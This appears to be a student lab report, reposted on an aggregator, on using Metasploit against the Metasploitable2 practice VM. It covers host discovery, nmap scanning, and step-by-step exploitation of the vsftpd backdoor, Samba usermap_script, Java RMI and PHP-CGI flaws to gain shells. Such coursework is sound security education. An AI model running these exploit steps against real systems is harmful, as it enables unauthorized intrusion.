20222325 2024-2025-1 《网络与系统攻防技术》实验六实验报告

news/2024/11/16 21:20:23/文章来源:https://www.cnblogs.com/shutong233/p/18547729

1.实验内容

本实践目标是掌握metasploit的用法。
指导书参考Rapid7官网的指导教程。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
下载官方靶机Metasploitable2,完成下面实验内容。
(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。
(2)Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
利用步骤:
在kali中执行msfconsole 启动metasploit
use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞
set RHOST XX.xx.xx.xx 设置要攻击的机器IP(靶机IP)
exploit/run 开始攻击
利用成功
执行uname –a、 pwd、 id等命令 验证
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
利用步骤:
use exploit/multi/samba/usermap_script 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit 开始攻击
利用成功 执行uname–a验证
(4)Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
操作步骤:
首先查看1099端口是否打开。
然后在MSF中:
use exploit/multi/misc/java_rmi_server
show options 查看配置参数
set RHOST (靶机IP)
exploit/run
sessions -i id
shell (进入meterpreter时,使用whoami验证下)
(5)PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
在kali中执行msfconsole,启动metasploit
msf > use exploit/multi/http/php_cgi_arg_injection 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit/run 开始攻击

2.实验过程

2.1 前期渗透

kali攻击机ip为172.20.10.128
Metasploitable2官方靶机ip为172.20.10.134(使用最初提供的靶机,没有前往官网下载,后续改用官网下载的靶机)

2.1.1 主机发现

攻击机打开msf控制台,输入search arp_sweep搜索arp_sweep相关模块,输入use 0选择使用攻击模块。

输入show options查看模块需要配置的选项。
输入set RHOSTS 172.20.10.0/24设置目标网络.执行该模块。
看到扫描到了5台主机。

2.1.2 端口扫描

输入nmap -p- 172.20.10.134对靶机进行端口扫描。可以看到开放的端口有21、22、23、25、53、80、139、445、3306、3632、5432、8009、8180(1099端口没有开放)

2.1.3 选做:扫描系统版本、漏洞

输入nmap -O 172.20.10.134对靶机的系统版本进行扫描。可以看到版本可能是Linux 2.6.9 - 2.6.33

输入nmap -p- -sV --version-all --script vuln 172.20.10.134检测靶机上所有端口的开放状态、服务版本以及潜在的漏洞。

2.2 Vsftpd源码包后门漏洞(21端口)

靶机ip变为172.20.10.135

进入msf控制台,输入search exploit/unix/ftp/vsftpd_234_backdoor扫描相关模块。
选择攻击模块,设置靶机ip,开始攻击。

依次输入:

id # 查看当前用户
whoami # 查看有效用户名
python -c 'import pty;pty.spawn("/bin/bash")' #进入交付模式
uname -a # 显示系统详细信息

2.3 SambaMS-RPC Shell命令注入漏洞(端口139)

进入msf控制台,输入search samba搜索samba相关模块。

使用攻击模块,查看要配置的信息。
配置靶机ip,执行攻击。

依次输入:

id # 查看当前用户
whoami # 查看当前有效用户名
python -c 'import pty;pty.spawn("/bin/bash")' #进入交付模式
uname -a # 显示系统详细信息

2.4 Java RMI SERVER命令执行漏洞(1099端口)

输入nmap -p- 172.20.10.135查看端口开放情况。确定1099端口开放。

进入msf控制台,输入search exploit/multi/misc/java_rmi_server搜索攻击模块并使用。

查看需要配置的信息,配置靶机ip,开始攻击。

进入shell用whoami查看有效用户名。

2.5 PHP CGI参数执行注入漏洞(80端口)

进入msf控制台,输入search exploit/multi/http/php_cgi_arg_injection搜索攻击模块并使用。
查看需要配置的信息。

配置靶机ip,开始攻击。

进入shell用whoami查看有效用户名。

3.问题及解决方案

  • 问题1:对靶机进行端口扫描时报错。

  • 问题1解决方案:查阅资料后发现对所有端口扫描要使用nmap -p- ip地址,而不是nmap -p ip地址。用前面的命令后成功扫描。

  • 问题2:在利用Vsftpd源码包后门漏洞时,报错Exploit completed, but no session was created,无法建立会话。

  • 问题2解决方案:检查配置无误。最后不再使用老师实现提供的靶机,而是安装题目提供的官方网址下载靶机,再次操作成功建立会话。

  • 问题3:在利用Java RMI SERVER命令执行漏洞时先进行端口扫描发现1099端口没有打开。

  • 问题3解决方案:想在防火墙打开1099端口发现靶机没有安装防火墙。最后不再使用老师实现提供的靶机,而是安装题目提供的官方网址下载靶机,再次扫描,1099端口开放。

4.学习感悟、思考等

本次实验重在练习掌握metasploit的用法,由于在进行实验之前做了充足的关于metasploit的实践练习,已经掌握了Search-Use-Show-Set-Exploit/run!这次实验并没有遇到太多的问题。实验中对Metasploitable2靶机漏洞的利用也让我认识到的漏洞的存在之多,在使用电脑时要注意网络安全,做好防护。

参考资料

  • Metasploitable2靶机之第六篇--Vsftpd源码包后门漏洞
  • Metasploitable2靶机之第四篇--Samba MS-RPC Shell 命令注入漏洞(CVE-2007-2447)
  • Metasploitable2靶机之第九篇--Java RMI SERVER 命令执行漏洞
  • Metasploitable2靶机之第十篇--PHP CGI参数注入执行漏洞(cve-2012-1823)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/834797.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[Linux]gdb基本使用

gdb基本使用 前提 gcc/g++编译出的程序默认是realease版本,要使用gdb调试,首先要在编译的时候加上-g选项。使用readelf -S [程序名]查看可执行文件的节区信息。使用gdb [程序名]:开始调试。q:退出调试。list/l [行号]:从给定的位置显示程序的源代码,每次十行。break/b [行…

美团商家联系电话采集软件团购外卖信息批量提取器

定义目标:明确需要采集的数据,如商家名称、地址、评分、销量等。 分析页面结构:通过浏览器的开发者工具,分析美团团购或外卖页面的HTML结构,找出包含所需数据的标签。 模拟用户请求:使用requests库模拟用户访问美团页面,可能需要处理登录、反爬虫机制(如Cookies、Heade…

# 团队作业4——项目冲刺-6

团队作业4——项目冲刺-6信息项 内容课程名称 广工计院计科34班软工作业要求位置 作业要求作业目标 在七天敏捷冲刺中,完成工大严选开发,记录每日进展和问题,更新燃尽图、签入代码,并发布集合日志总结成果GitHub链接 GitHub一、团队简介队名:小飞棍队团队成员:姓名 学号罗…

20222427 2024-2025-1 《网络与系统攻防技术》实验五实验报告

1.实验内容 1.1 本周内容总结使用了Metasploit框架,其是一个功能强大的渗透测试框架。在使用的过程当中,Metasploit 提供了种类繁多的攻击模块,涵盖了远程代码执行、服务拒绝、提权等多种攻击方式,支持对多种操作系统和应用程序进行测试。除了漏洞利用,它还具备强大的后渗…

20222306 2024-2025-1《网络与系统攻防技术》实验六实验报告

1.实验内容 1.1内容回顾总结 这周都重点在于Metasploit工具的使用,我深入了解了对其功能和使用流程。Metasploit 是一个功能强大的渗透测试框架,广泛应用于网络安全领域。它为安全专家、渗透测试人员和红队提供了一个全面的工具集,支持漏洞利用、攻击模拟和安全评估。Metaspl…

关于HDFS路径文件夹名称的问题

问题发现 ​ 最开始的需求:修改/origin_data/gmall/db目录下所有以inc结尾的文件夹里的文件夹(名称为2024-11-15)修改为2020-6-14 问gpt写了个脚本: #!/bin/bash# 遍历 /origin_data/gmall/db 下所有以 "inc" 结尾的文件夹 for dir in $(hdfs dfs -ls /origin_da…

2024数据采集与融合技术实践-作业4

作业①: 1)使用Selenium框架+ MySQL数据库存储技术路线爬取“沪深A股”、“上证A股”、“深证A股”3个板块的股票数据信息。 1.核心代码描述 from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDri…

第七章课后习题

习题7.1点击查看代码 import numpy as np from scipy.interpolate import interp1d from scipy.integrate import quad import matplotlib.pyplot as pltg = lambda x: (3 * x ** 2 + 4 * x + 6) * np.sin(x) / (x ** 2 + 8 * x + 6) x0 = np.linspace(0, 10, 1000) y0 = g(x0)…

第八章课后习题

习题8.4点击查看代码 from scipy.integrate import odeint import numpy as np import matplotlib.pyplot as plt # 设置 Matplotlib 不使用 LaTeX plt.rc(font, size=15) plt.rc(text, usetex=False)# 定义微分方程系统 dz = lambda z, t: [-z[0]**3 - z[1], z[0] - z[1]**3]#…

Solidity学习笔记-1

01.Hello World 开发工具 Remix // SPDX-License-Identifier: MIT // 软件许可,不写编译会出现警告 // 版本,“0.8.21”-->不能小于这个版本,"^"-->不能大于0.9.0 pragma solidity ^0.8.21; // 创建合约 contract HelloWorld {string public helloworld = &quo…

gofiber: 使用模板

一,安装模板库 $ go get github.com/gofiber/template/html/v2 go: downloading github.com/gofiber/template/html/v2 v2.1.2 go: downloading github.com/gofiber/utils v1.1.0 go: added github.com/gofiber/template/html/v2 v2.1.2 go: added github.com/gofiber/utils v…

书生共学大模型实战营第4期 L1G6000 OpenCompass评测作业

基础任务:使用OpenCompass评测浦语API记录复现过程并截图 按照教程流程进行,这里我们采用的测试样本数为2,所以不同于教程,Acc可能为0,25%,50%,75%,100%,介绍两个遇到的bug:metadata模块导入错误:ModuleNotFoundError: No module named importlib.metadata解决方法:…